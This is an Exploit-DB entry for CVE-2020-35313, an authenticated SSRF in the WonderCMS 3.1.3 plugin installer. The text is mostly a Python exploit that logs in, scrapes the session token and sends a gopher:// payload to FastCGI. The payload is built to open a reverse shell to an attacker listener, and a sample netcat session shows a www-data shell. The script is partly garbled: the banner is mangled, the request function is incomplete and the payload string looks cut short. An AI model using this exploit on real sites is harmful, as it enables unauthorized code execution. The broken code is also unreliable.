WonderCMS 3.1.3 – Authenticated SSRF to Remote Remote Code Execution

  • 作者: zetc0de
    日期: 2020-12-02
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/49154/
  • # Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
    # Date: 2020-11-27
    # Exploit Author: zetc0de
    # Vendor Homepage: https://www.wondercms.com/
    # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
    # Version: 3.1.3
    # Tested on: Ubuntu 16.04
    # CVE : CVE-2020-35313
    # WonderCMS is vulnerable to SSRF Vulnerability.
    # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
    # The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost.
    # when the attacker can pointing the request to localhost, this lead to SSRF vulnerability. 
    # the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000
    # python exploit.py
    # [+] Getting Token
    # [+] Sending payload
    # [+] Get reverse shell
    # nc -lnvp 1234
    # Connection from
    # /bin/sh: 0: can't access tty; job control turned off
    # $ whoami
    # www-data
    # $
    import requests
    from bs4 import BeautifulSoup
    from termcolor import colored
    from time import sleep
    \ \/_ \\ | _ \ __| _ \__|\|__| 
     \ \ \/( |.| ||_|/ (|\/ |\__ \ 
    ------[SSRF to Remote Code Execution ]------
    loginURL = "http://wonder.com/loginURL"
    password = "GpIyq0RH"
    lhost = ""
    lport = "1234"
    payload = "gopher://{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport)
    r = requests.session()
    data = { "password" : password }
    page = r.post(loginURL,data)
    if "Wrong" in page.text:
    	print(colored("[!] Exploit Failed : Wrong Credential","red"))
    print(colored("[+] Getting Token","cyan"))
    soup = BeautifulSoup(page.text, "html.parser")
    allscript= soup.find_all("script")
    no = 0
    for i in allscript:
    	if "rootURL" in str(i):
    		url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
    	elif "token" in str(i):
    		token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
    def sendPayload(req,url,payload,token):
    	getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
    print(colored("[+] Sending payload","cyan"))
    print(colored("[+] Get reverse shell","cyan"))
    print(colored("[+] Good bye","cyan"))